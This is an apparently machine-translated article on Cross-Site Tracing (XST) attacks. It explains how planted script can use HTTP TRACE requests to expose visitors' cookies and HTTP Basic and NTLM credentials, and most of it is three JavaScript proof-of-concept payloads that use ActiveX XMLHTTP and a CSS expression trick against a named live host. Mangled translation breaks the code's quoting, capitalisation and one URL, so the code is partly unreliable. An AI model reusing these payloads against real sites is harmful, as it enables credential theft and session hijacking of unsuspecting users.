Research on Cross-site Tracing xst Attack _ vulnerability

Note: The article has been published in the 8 issue of the hacker line of defense, the copyright belongs to it

Xst Attack Description:
An attacker embeds malicious code into a Web file on a host that has already been controlled, and when the visitor browses, the malicious code executes in the browser, and then the visitor's cookie, HTTP Basic authentication, and NTLM authentication information are sent to the host that is already under control, while the trace request is delivered to the target host. Lead to cookie spoofing or man-in-the-middle attack.

XST Attack conditions:
1, require the target Web server to allow trace parameters;
2, need a place to insert the XST code;
3, the target site has a cross-domain vulnerability.

Xst vs. XSS comparisons:
The same point: are very deceptive, can be harmful to the victim host, and this attack is multiplatform and multiple technology, we can also use active control, Flash, Java, etc. for XST and XSS attacks.
Advantages: You can bypass general HTTP authentication and NTLM authentication

How to use:

Technique 1:

<script Type=text/java script>
<!--
function Xsstrace () {
var xmlhttp=new activexobject (\ "Microsoft.xmlhttp\");
Xmlhttp.open (\ "trace\", \ "Http://wmjie.51.net/swords/\", false);
Xmlhttp.send ();
Xmldoc=xmlhttp.responsetext;
alert (xmldoc);
}

-->
</SCRIPT>
<br><input Onclick=xsstrace (); Type=button value=\ "XSS trace\" >
Technique 2:
<script Type=text/java script>
<!--
function Xsstrace () {
var openwin=open (\ "blank.htm\", "swords\", "width=500,height=400\");
var otraceswords=openwin.external;
Openwin.location.href=\ "Http://wmjie.51.net/swords/\";
SetTimeout (
function () {
The following must be written on one line
Otraceswords. Navigateandfind (' Java script:xmlhttp=new activexobject (\ microsoft.xmlhttp\); Xmlhttp.open (\ "TRACE\", \ "http:// Wmjie.51.net/swords/\ ", false); Xmlhttp.send (); Xmldoc=xmlhttp.responsetext;alert (\" Not Document.cookie Displays the header information for the site wmjie.51.net/swords/. \\n\ "+ xmldoc); ', \" \ ", \" \ ");
},
1024
);
}
-->
</SCRIPT>
<br><input Onclick=xsstrace (); Type=button value=\ "XSS trace\" >

Technique 3:

<script Type=text/java script>
function Xsstrace () {
var swords = \ "var xmlHttp = new ActiveXObject (\" microsoft.xmlhttp\\ ") \;xmlhttp.open (\" trace\\ ", \" http://http://") Www.tingh.com/\\ ", False) \;xmlhttp.send () \;xmldoc=xmlhttp.responsetext\;alert (xmldoc) \;\";
var target = \ "Http://wmjie.51.net/swords/\";
Spinach = encodeURIComponent (swords + '; Top.close () ');
var readycode = ' Font-size:expression (execscript (decodeuricomponent (\ "' + Spinach + '))";
ShowModalDialog (target, NULL, readycode);
}
</SCRIPT>
<br><input onclick=xsstrace () Type=button value=\ "XSS trace\" >

PostScript: Research stage, hope to be able to make a point, expect and you can exchange experience experience.